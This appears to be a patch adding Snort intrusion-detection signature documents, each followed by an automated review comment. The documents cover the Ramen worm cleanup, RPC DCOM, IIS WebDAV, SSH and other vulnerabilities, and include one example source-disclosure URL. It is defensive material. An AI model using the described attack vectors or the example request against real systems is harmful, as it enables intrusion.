+- Delete line "/user/src/.poop/start*.sh" in /etc/rc.d/rc.sysinit
+- ps -Af | grep "asp" (Search PID of asp service port webserver)
+- kill -9 %PID_you_just_saw%
+- rm /sbin/asp (backdoor webserver, which binds to 27374)
+- Service startup:
+ - Using Inetd (Redhat 6): remove line "asp stream tcp nowait root" form /etc/inetd.conf and restart inetd service
+ - Using XInet.d (Redhat 7): rm -rf /etc/xinet.d/asp
+- Update /etc/hosts.deny because Ramen worm deletes the file or modifies it
+- Check index(.htm/html) files since they may be modified by the worm
+- Update WuFTPd server, NFS service, LPRng service
+- Reboot the host
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
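Review bot: the Corrective Action checklist removes /sbin/asp (the port 27374 web server) but never deals with the suid shell that Detailed Information says the statd exploit binds on port 39168, so a host stays backdoored after following these steps; add a step to locate and kill that listener, and note that a worm-compromised host is normally rebuilt rather than cleaned by hand. Path inconsistency: the first step removes /usr/src/.poop while the third refers to "/user/src/.poop/start*.sh"; "/etc/xinet.d/asp" also looks like a typo for /etc/xinetd.d/asp. Additional References is empty.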
--- /dev/null
+++ b/doc/signatures/1237.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1237
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
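Review bot: third copy of the same generic web-server text (see 1381.txt and 1192.txt in this patch); without the matched URI or content string in Summary or Detailed Information, 1237.txt gives an analyst nothing specific to check and the "None known." False Positives claim cannot be evaluated. Add the specific pattern and, if the rule targets a product, an Additional References entry.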
--- /dev/null
+++ b/doc/signatures/1886.txt
@@ -0,0 +1,69 @@
+Rule:
+
+
+--
+Sid: 
+
+1886
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(apache)" is an output of an "id" command indicating that the user
+has "apache" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Attack Scenarios: 
+
+a buffer overflow exploit against the WWW server
+results in "/bin/sh" being executed. An automated script performing an
+attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives: 
+
+the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: 
+
+not known
+
+-- 
+Corrective Action: 
+
+investigate the server for signs of compromise, run
+the integrity checking software, look for other IDS alerts involving
+the same IP addresses.
+
+--
+Contributors: 
+
+Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
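Review bot: the Summary only says the rule "has been placed in deleted.rules" and gives no reason; state why it was retired and which rule, if any, replaces it, since analysts reading historical alerts will land here. Keep a one-line description of the original detection in the Summary too (Detailed Information does describe it: "uid=" together with "(apache)" in id output on a web port). The file also lacks the Affected Systems section, the sentences in Impact, Attack Scenarios, Ease of Attack and False Positives start in lowercase, and the Sid value is separated from its label by a blank line unlike the other files.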
--- /dev/null
+++ b/doc/signatures/3170.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3170
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
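Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") contradicts Detailed Information, which says the trigger is a malformed DCOM request sent to an RPC port; align the two so the reader knows the vector is RPC rather than file sharing. "Expoit code exists" should be "Exploit code exists". Additional References is empty; cite the vendor bulletin and CVE for this issue.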
--- /dev/null
+++ b/doc/signatures/439.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+
+Sid:
+439
+
+--
+
+Summary:
+This event is generated when an ICMP Type 19 Code 0 (ICMP Reserved for Security) datagram is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 19 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 19 is not defined for use and is not expected network activity.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 19 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
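Review bot: the Impact line ("ICMP Type 19 datagrams are not currently used by any known devices") restates Detailed Information instead of giving an impact; say what seeing one implies, for example a crafted packet, a covert channel or a scanner probing filtering rules. Attack Scenarios "None known" sits oddly beside Ease of Attack "Numerous tools and scripts can generate this type of ICMP datagram"; give a scenario or state that the likely cause is reconnaissance. The Affected Systems section is missing, and Additional References could point at the IANA ICMP parameters registry that reserves type 19.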
--- /dev/null
+++ b/doc/signatures/3085.txt
@@ -0,0 +1,59 @@
+Rules:
+
+--
+Sid:
+3085
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with AOL Instant Messenger (AIM) goaway message.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+AIM is instant messaging software supplied by AOL Time Warner. A malicious
+URL offered in an AIM message or web page that sends an AIM client an overly
+long AIM "Away" message can cause a buffer overflow on a vulnerable client.
+This can permit the execution of arbitrary code on the client host.
+
+--
+Affected Systems:
+AOL Instant Messenger 5.5, 5.5.3415 Beta, 5.5.3595
+
+--
+Attack Scenarios:
+An attacker can send an overly long AIM "Away" message or a user could be
+enticed to view a site that embeds such a message.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+A Metasploit attack that exploits this vulnerability uses an HTTP port of
+8080.  Other HTTP ports can be used for this attack as well.
+
+--
+Corrective Action:
+Upgrade to the most current nonaffected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+iDefense:
+http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
+--
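Review bot: the header reads "Rules:" while every other file in this patch uses "Rule:"; fix for consistency since tooling may key on it. The Summary calls it a "goaway message" while Detailed Information describes an overly long "Away" message; say once that the goaway URL and the Away message refer to the same feature, or use a single term. The False Negatives note (Metasploit uses port 8080, other ports are possible) implies the rule only inspects configured HTTP ports; state that explicitly under Detailed Information so operators know to extend their port list.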
--- /dev/null
+++ b/doc/signatures/2091.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2091
+
+--
+Summary:
+server is attempted.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in a component used by the Microsoft Internet 
+Information Server 5.0 implementation of WebDAV. A specially crafted 
+overly long URI when processed by the server, triggers a buffer overflow
+in ntdll.dll which results in a system compromise of the targeted host.
+
+The exploit only affects versions of IIS 5.0 running on Microsoft 
+Windows 2000 prior to service pack 3. WebDAV is enabled by default on 
+that platform.
+
+vulnerabilities using the security scanner nessus.
+
+--
+Affected Systems:
+Microsoft Internet Information Server 5.0 WebDAV on Windows 2000 prior 
+to Service Pack 3.
+
+--
+Attack Scenarios:
+The attacker is using nessus.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch or service pack.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11412
+
+CERT:
+http://www.cert.org/advisories/CA-2003-09.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0109
+
+Bugtraq:
+http://www.securityfocus.com/bid/7116
+
+Microsoft Corporation:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-007.asp
+http://www.microsoft.com/security/security_bulletins/ms03-007.asp
+
+--
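Review bot: The Summary is a sentence fragment ("server is attempted.") and Detailed Information contains a dangling line ("vulnerabilities using the security scanner nessus."); the leading text of both sentences has been lost and needs restoring. Impact says only "Information disclosure" while Detailed Information describes a buffer overflow in ntdll.dll resulting in a system compromise, so the Impact line understates what the text itself claims. The Attack Scenarios entry "The attacker is using nessus." suggests the rule matches scanner traffic rather than an exploit; if so, that belongs in the Summary and in False Positives.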
--- /dev/null
+++ b/doc/signatures/810.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+810
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
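Review bot: Typo in Detailed Information: "running ona web server" should be "running on a web server". The Summary and Detailed Information are generic boilerplate that never name the CGI application or pattern SID 810 matches, and Additional References is empty; an analyst triaging the event needs the target identified and a reference cited.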
--- /dev/null
+++ b/doc/signatures/1054.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+
+Sid:
+1054
+
+--
+
+Summary:
+Someone attempted to gain unauthorized access to web application source code
+through a BEA WebLogic Server or Apache Tomcat JSP vulnerability.
+
+--
+Impact:
+An attacker may have been able to read the source code to a web application.
+Sometimes web application source code contains highly sensitive information,
+such as database passwords and information concerning backend setups.  This
+could be a prelude to further attacks.
+
+--
+Detailed Information:
+Some versions of BEA WebLogic and Apache Tomcat web servers contain
+vulnerabilities that can allow an attacker to read the source code to
+web applications.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following:
+http://www.example.com/index.js%70
+
+--
+Ease of Attack:
+Very simple handcrafted URL.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a web request was being done.  Try to
+determine what the requested file was, and determine
+from the web server's configuration whether it was a threat or not
+(e.g., whether the requested file even existed and whether the web
+server was vulnerable to such attacks).
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
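Review bot: Header layout differs from the other files ("Rule:" followed immediately by "--" and then a blank line before "Sid:"); align with the "Rule:" / blank / "--" / "Sid:" order used elsewhere. Affected Systems is empty although the Summary names BEA WebLogic Server and Apache Tomcat, and "unkown" in Contributors should be "unknown". Corrective Action describes triage (examine the packet, check whether the file existed) rather than remediation; the upgrade/patch advice belongs here and the examination steps read better as a note under False Positives.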
--- /dev/null
+++ b/doc/signatures/2906.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2906
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
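Review bot: Detailed Information has a stray line break before the period after "drop_snapshot_repgroup", leaving ". This procedure is included in" on its own line; join the sentence. "Oracle Oracle9i" in Affected Systems duplicates the vendor name. Additional References is empty even though the text asserts a known vulnerability in a named procedure; cite the vendor alert or CVE entry.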
--- /dev/null
+++ b/doc/signatures/3344.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3344
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
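Review bot: "Expoit" in Ease of Attack should be "Exploit". Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed RPC request sent to an RPC port; reconcile the two so the scenario describes the vector the rule actually detects. Additional References is empty for a well-known RPC DCOM issue; cite the vendor bulletin. In Corrective Action it is worth saying that 135 is the RPC endpoint mapper while 139 and 445 carry SMB, so readers understand why all three are listed.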
--- /dev/null
+++ b/doc/signatures/1326.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1326
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with root privileges. Denial 
+of Service (DoS) on certain network devices.
+
+--
+Detailed Information:
+A flaw in the CRC32 compensation attack detection code may result in 
+arbitrary code execution with the privileges of the user running the SSH
+daemon (usually root).
+
+Some Netscreen devices may suffer a Denial of Service.
+
+Affected Systems:
+	OpenSSH versions prior to 2.2
+	Multiple Cisco network devices
+	Multiple Netscreen network devices
+	SSH Secure Communications prior to 1.2.31
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted large SSH packets to 
+cause the overflow and present the opportunity to write values to memory
+locations.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+Analysis by David Dittrich:
+http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+
+--
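Review bot: The "--" separator is missing between "Some Netscreen devices may suffer a Denial of Service." and "Affected Systems:", unlike every other section break in the file. "compromize" in Impact should be "compromise", and "Exploit scripts are available" under Attack Scenarios lacks a terminating period and duplicates the Ease of Attack line. Affected Systems gives "OpenSSH versions prior to 2.2"; the boundary is worth verifying against the cited CERT note before the doc ships, since readers will use it to decide whether they are exposed.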
--- /dev/null
+++ b/doc/signatures/3360.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3360
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
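Review bot: The body of this file is identical to 3344.txt (same Summary, Detailed Information, Attack Scenarios and the same "Expoit" typo), so nothing tells the reader what distinguishes SID 3360 from SID 3344; each doc should name the specific RPC interface or request its rule matches. The same corrections apply here: fix "Expoit", reconcile Attack Scenarios with the RPC vector described in Detailed Information, and add a vendor reference.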
--- /dev/null
+++ b/doc/signatures/3005.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3005
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
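Review bot: The "Attack Scenarios:" section is missing entirely (the file goes from Affected Systems straight to Ease of Attack), and the final section is headed "References:" where every other file uses "Additional References:"; both break the common template. Typos in Detailed Information: "taget" should be "target" and "excuted" should be "executed". Affected Systems lists "Microsoft Windows 2003" while the other files write "Windows Server 2003".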
--- /dev/null
+++ b/doc/signatures/1305.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1305
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
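Review bot: Affected Systems and Additional References are both empty, and the Summary says only "a directory traversal attack" without naming the pattern or service; Detailed Information covers web, web application and ftp servers while Attack Scenarios speaks only of the ftp root directory, so the text should state which protocol SID 1305 inspects. "None known" under False Positives/Negatives and "Apply the appropriate vendor supplied patches" lack the terminating periods used elsewhere in the file.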
--- /dev/null
+++ b/doc/signatures/2287.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2287
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
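Review bot: Attack Scenarios is the generic authentication boilerplate ("access an authentication mechanism and supply his/her own credentials") and does not match Detailed Information, which describes unvalidated input leading to PHP code execution and file inclusion; the scenario should describe that vector. Comma splice in Detailed Information: "when handling user input, this may lead" should be two sentences. Additional References is empty for a named product and version (Proxy2.de Advanced Poll 2.0.2); cite the advisory.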
--- /dev/null
+++ b/doc/signatures/562.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+562
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
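Review bot: "sucessful" appears three times (Summary and twice in Detailed Information) and should be "successful". The Additional References entry (OpenNap Specification, napster.txt) has no connection to the text, which describes a generic attack-responses.rules event; either the reference or the description belongs to a different SID and should be checked. Since an attack-response event is only meaningful alongside the attack it follows, Corrective Action could add "correlate with the preceding inbound alert" next to the existing log-file and high-port checks.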
--- /dev/null
+++ b/doc/signatures/1797.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1797
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "BDSM".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "BDSM".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
